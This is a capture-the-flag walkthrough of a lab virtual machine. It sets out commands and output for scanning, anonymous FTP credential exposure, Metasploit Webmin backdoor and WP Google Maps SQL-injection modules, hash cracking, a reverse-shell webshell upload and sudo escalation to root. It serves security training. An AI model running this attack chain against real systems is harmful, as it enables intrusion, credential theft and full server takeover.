[*]
1. Find Host: nmap -sn 172.16.16.0/24
Nmap scan report for 172.16.16.30
Host is up (0.00017s latency).
MAC Address: 08:00:27:61:64:4D (Oracle VirtualBox virtual NIC)
Nmap scan report for 172.16.16.4
Host is up.
[*]
2. Scan host: nmap 172.16.16.30
Nmap scan report for 172.16.16.30
Host is up (0.00019s latency).
Not shown: 996 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
10000/tcp open  snet-sensor-mgmt
[*]
3. Port enumeration: nmap 172.16.16.30 -sV -A -p 21,22,80,10000
root@hostmachine:~/vulnhubdb# nmap 172.16.16.30 -sV -A -p 21,22,80,10000
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-28 14:33 CST
Stats: 0:00:30 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.44% done; ETC: 14:33 (0:00:00 remaining)
Nmap scan report for 172.16.16.30
Host is up (0.00036s latency).
[*]
PORT      STATE SERVICE  VERSION
21/tcp    open  ftp      vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-rw-r--    1 ftp      ftp           420 Nov 30  2017 index.php
| -rw-rw-r--    1 ftp      ftp         19935 Sep 05 08:02 license.txt
| -rw-rw-r--    1 ftp      ftp          7447 Sep 05 08:02 readme.html
| -rw-rw-r--    1 ftp      ftp          6919 Jan 12  2019 wp-activate.php
| drwxrwxr-x    9 ftp      ftp          4096 Sep 05 08:00 wp-admin
| -rw-rw-r--    1 ftp      ftp           369 Nov 30  2017 wp-blog-header.php
| -rw-rw-r--    1 ftp      ftp          2283 Jan 21  2019 wp-comments-post.php
| -rw-rw-r--    1 ftp      ftp          3255 Sep 27 13:17 wp-config.php
| drwxrwxr-x    8 ftp      ftp          4096 Sep 29 07:36 wp-content
| -rw-rw-r--    1 ftp      ftp          3847 Jan 09  2019 wp-cron.php
| drwxrwxr-x   20 ftp      ftp         12288 Sep 05 08:03 wp-includes
| -rw-rw-r--    1 ftp      ftp          2502 Jan 16  2019 wp-links-opml.php
| -rw-rw-r--    1 ftp      ftp          3306 Nov 30  2017 wp-load.php
| -rw-rw-r--    1 ftp      ftp         39551 Jun 10  2019 wp-login.php
| -rw-rw-r--    1 ftp      ftp          8403 Nov 30  2017 wp-mail.php
| -rw-rw-r--    1 ftp      ftp         18962 Mar 28  2019 wp-settings.php
| -rw-rw-r--    1 ftp      ftp         31085 Jan 16  2019 wp-signup.php
| -rw-rw-r--    1 ftp      ftp          4764 Nov 30  2017 wp-trackback.php
|_-rw-rw-r--    1 ftp      ftp          3068 Aug 17  2018 xmlrpc.php
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 172.16.16.4
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open  ssh      OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey: 
|   2048 b7:2e:8f:cb:12:e4:e8:cd:93:1e:73:0f:51:ce:48:6c (RSA)
|   256 70:f4:44:eb:a8:55:54:38:2d:6d:75:89:bb:ec:7e:e7 (ECDSA)
|_  256 7c:0e:ab:fe:53:7e:87:22:f8:5a:df:c9:da:7f:90:79 (ED25519)
80/tcp    open  http     Apache httpd 2.4.25 ((Debian))
|_http-generator: WordPress 5.2.3
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Tata intranet &#8211; Just another WordPress site
10000/tcp open  ssl/http MiniServ 1.890 (Webmin httpd)
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: Login to Webmin
| ssl-cert: Subject: commonName=*/organizationName=Webmin Webserver on Linux-Debian
| Not valid before: 2019-09-09T13:32:42
|_Not valid after:  2024-09-07T13:32:42
|_ssl-date: TLS randomness does not represent time
MAC Address: 08:00:27:61:64:4D (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
[*]
4. Tons of approaches here. The FTP dir has anon login, so i'm going to generate, and upload a shell.
anon login to FTP
download wp-config
/** MySQL database username */
define( 'DB_USER', 'wordpress' );
[*]
/** MySQL database password */
define( 'DB_PASSWORD', 'nvwtlRqkD0E1jBXu' );
[*]
5. wordpress scan: wpscan -u http://172.16.16.30
i] It seems like you have not updated the database for some time
[i] Last database update: 2019-12-13
[?] Do you want to update now? [Y]es  [N]o  [A]bort update, default: [N] > N
[+] URL: http://172.16.16.30/
[+] Started: Sat Dec 28 14:46:36 2019

[+] Interesting header: LINK: <http://172.16.16.30/index.php?rest_route=/>; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.25 (Debian)
[+] XML-RPC Interface available under: http://172.16.16.30/xmlrpc.php   [HTTP 405]
[+] Found an RSS Feed: http://172.16.16.30/?feed=rss2   [HTTP 200]
[!] Detected 1 user from RSS feed:
+-----------+
| Name      |
+-----------+
| webmaster |
+-----------+
[!] Upload directory has directory listing enabled: http://172.16.16.30/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://172.16.16.30/wp-includes/

[+] Enumerating WordPress version ...

[+] WordPress version 5.2.3 (Released on 2019-09-05) identified from meta generator, links opml
[!] 9 vulnerabilities identified from the version number

[!] Title: WordPress <= 5.2.3 - Stored XSS in Customizer
    Reference: https://wpvulndb.com/vulnerabilities/9908
    Reference: https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
    Reference: https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17674
[i] Fixed in: 5.2.4

[!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
    Reference: https://wpvulndb.com/vulnerabilities/9909
    Reference: https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
    Reference: https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
    Reference: https://github.com/WordPress/WordPress/commit/f82ed753cf00329a5e41f2cb6dc521085136f308
    Reference: https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17671
[i] Fixed in: 5.2.4

[!] Title: WordPress <= 5.2.3 - Stored XSS in Style Tags
    Reference: https://wpvulndb.com/vulnerabilities/9910
    Reference: https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
    Reference: https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17672
[i] Fixed in: 5.2.4

[!] Title: WordPress <= 5.2.3 - JSON Request Cache Poisoning
    Reference: https://wpvulndb.com/vulnerabilities/9911
    Reference: https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
    Reference: https://github.com/WordPress/WordPress/commit/b224c251adfa16a5f84074a3c0886270c9df38de
    Reference: https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17673
[i] Fixed in: 5.2.4

[!] Title: WordPress <= 5.2.3 - Server-Side Request Forgery (SSRF) in URL Validation 
    Reference: https://wpvulndb.com/vulnerabilities/9912
    Reference: https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
    Reference: https://github.com/WordPress/WordPress/commit/9db44754b9e4044690a6c32fd74b9d5fe26b07b2
    Reference: https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17669
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17670
[i] Fixed in: 5.2.4

[!] Title: WordPress <= 5.2.3 - Admin Referrer Validation
    Reference: https://wpvulndb.com/vulnerabilities/9913
    Reference: https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
    Reference: https://github.com/WordPress/WordPress/commit/b183fd1cca0b44a92f0264823dd9f22d2fd8b8d0
    Reference: https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17675
[i] Fixed in: 5.2.4

[!] Title: WordPress <= 5.3 - Improper Access Controls
    Reference: https://wpvulndb.com/vulnerabilities/9973
    Reference: https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
[i] Fixed in: 5.2.5

[!] Title: WordPress <= 5.3 - Stored XSS via Crafted Links
    Reference: https://wpvulndb.com/vulnerabilities/9975
    Reference: https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
[i] Fixed in: 5.2.5

[!] Title: WordPress <= 5.3 - Stored XSS via Block Editor Content
    Reference: https://wpvulndb.com/vulnerabilities/9976
    Reference: https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
[i] Fixed in: 5.2.5

[+] WordPress theme in use: twentyseventeen - v2.2

[+] Name: twentyseventeen - v2.2
 |  Latest version: 2.2 (up to date)
 |  Last updated: 2019-05-07T00:00:00.000Z
 |  Location: http://172.16.16.30/wp-content/themes/twentyseventeen/
 |  Readme: http://172.16.16.30/wp-content/themes/twentyseventeen/README.txt
 |  Style URL: http://172.16.16.30/wp-content/themes/twentyseventeen/style.css
 |  Theme Name: Twenty Seventeen
 |  Theme URI: https://wordpress.org/themes/twentyseventeen/
 |  Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a...
 |  Author: the WordPress team
 |  Author URI: https://wordpress.org/

[+] Enumerating plugins from passive detection ...
 | 1 plugin found:

[+] Name: wp-google-maps - v7.10.02
 |  Last updated: 2019-12-11T09:46:00.000Z
 |  Location: http://172.16.16.30/wp-content/plugins/wp-google-maps/
 |  Readme: http://172.16.16.30/wp-content/plugins/wp-google-maps/readme.txt
[!] The version is out of date, the latest version is 8.0.11
[!] Directory listing is enabled: http://172.16.16.30/wp-content/plugins/wp-google-maps/

[!] Title: WP Google Maps <= 7.10.41 - Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/9243
    Reference: https://security-consulting.icu/blog/2019/02/wordpress-wpgooglemaps-xss/
    Reference: https://lists.openwall.net/full-disclosure/2019/02/05/13
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9912
[i] Fixed in: 7.10.43

[!] Title: WP Google Maps 7.11.00-7.11.17 - Unauthenticated SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/9249
    Reference: https://plugins.trac.wordpress.org/changeset/2061434/wp-google-maps/trunk/includes/class.rest-api.php
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10692
[i] Fixed in: 7.11.18

[!] Title: WP Google Maps <= 7.11.27 - Admin Settings CSRF
    Reference: https://wpvulndb.com/vulnerabilities/9332
    Reference: https://plugins.trac.wordpress.org/changeset/2099647/wp-google-maps/trunk/legacy-core.php?old=2092302&old_path=wp-google-maps%2Ftrunk%2Flegacy-core.php
[i] Fixed in: 7.11.28

[!] Title: WP Google Maps <= 7.11.34 - CSRF to Stored XSS
    Reference: https://wpvulndb.com/vulnerabilities/9442
    Reference: https://plugins.trac.wordpress.org/changeset/2119722
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14792
[i] Fixed in: 7.11.35

[+] Finished: Sat Dec 28 14:46:38 2019
[+] Elapsed time: 00:00:01
[+] Requests made: 74
[+] Memory used: 74.512 MB
[*]
6. Attempted FTP file upload: permission denied
attempted login with wordpress,admin, and webmaster
[*]
7. Search: ftp version, ssh version, webserver "apache" version, webserver "webmin" version:
searchsploit webmin 1. | cut -d ' ' -f 1-10
Webmin 0.9x / Usermin 0.9x/1.0 - Access Session ID Spoofing
Webmin 1.5 - Brute Force / Command Execution  
Webmin 1.5 - Web Brute Force (CGI)   
Webmin 1.580 - '/file/show.cgi' Remote Command Execution (Metasploit)  
Webmin 1.850 - Multiple Vulnerabilities     
Webmin 1.900 - Remote Command Execution (Metasploit)   
Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit) 
Webmin 1.920 - Remote Code Execution    
Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)  
Webmin 1.x - HTML Email Command Execution   
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File
phpMyWebmin 1.0 - 'target' Remote File Inclusion   
phpMyWebmin 1.0 - 'window.php' Remote File Inclusion   
[*]
8. Very interested in the metasploit exploits.
use exploit/unix/webapp/webmin_backdoor
set rhost 172.16.16.30
set lhost 172.16.16.4
set lport 443
set ssl true
[*]
9. Get flag:
id    
uid=0(root) gid=0(root) groups=0(root)
ls /root
flag.txt
3dcdf93d2976321d7a8c47a6bb2d48837d330624
[*]
10. Try wordpress : **in msfconsole** search wp_google:
0  auxiliary/admin/http/wp_google_maps_sqli              2019-04-02       normal  Yes    WordPress Google Maps Plugin SQL Injection
[*]
11. This matches our vulnerability. Lets try this:
use auxiliary/admin/http/wp_google_maps_sqli
set rhost 172.16.16.30
exploit
172.16.16.30:80 - Trying to retrieve the wp_users table...
[+] Credentials saved in: /root/.msf4/loot/20191228151845_default_172.16.16.30_wp_google_maps.j_179254.bin
[+] 172.16.16.30:80 - Found webmaster $P$BsqOdiLTcye6AS1ofreys4GzRlRvSr1 webmaster@none.local
[*]
12. Get credentials: cat
[+] Credentials saved in: /root/.msf4/loot/20191228151845_default_172.16.16.30_wp_google_maps.j_179254.bin
[+] 172.16.16.30:80 - Found webmaster $P$BsqOdiLTcye6AS1ofreys4GzRlRvSr1 webmaster@none.local
[*]
13. Put user:hash in txt file, identify hash
echo 'webmaster:$P$BsqOdiLTcye6AS1ofreys4GzRlRvSr1' > ~/user.hash
hash-identifier
$P$BsqOdiLTcye6AS1ofreys4GzRlRvSr1
Possible Hashs:
[+] MD5(Wordpress)
[*]
14. Crack hash: john user.hash --fork=8 --wordlist=/usr/share/wordlists/rockyou.txt
john user.hash --fork=8 --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Node numbers 1-8 of 8 (fork)
Press 'q' or Ctrl-C to abort, almost any other key for status
kittykat1        (webmaster)
[*]
15. Let's upload our webshell. You can do this with metasploit, or manually with a plugin generated by wordpwn.py (github)
use exploit/unix/webapp/wp_admin_shell_upload
set PASSWORD kittykat1
set USERNAME webmaster
set RHOST 172.16.16.30
set LHOST 172.16.16.4
set LPORT 4444
[*]
16. Drop into shell:
shell
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*]
17. Upgrade shell: python -c 'import pty;pty.spawn(["/bin/bash", "-i"])';
cat flag.txt
cat: flag.txt: Permission denied
[*]
18. Login as webmaster **same password as wp login**
cat flag.txt
83cad236438ff0c0dbce55d7f0034aee18f5c39e
[*]
19. Check permissions: sudo -l
User webmaster may run the following commands on localhost:
    (ALL) ALL
[*]
20. Get root, get flag:
sudo su -
cat flag.txt
3dcdf93d2976321d7a8c47a6bb2d48837d330624

FIN :)
[*]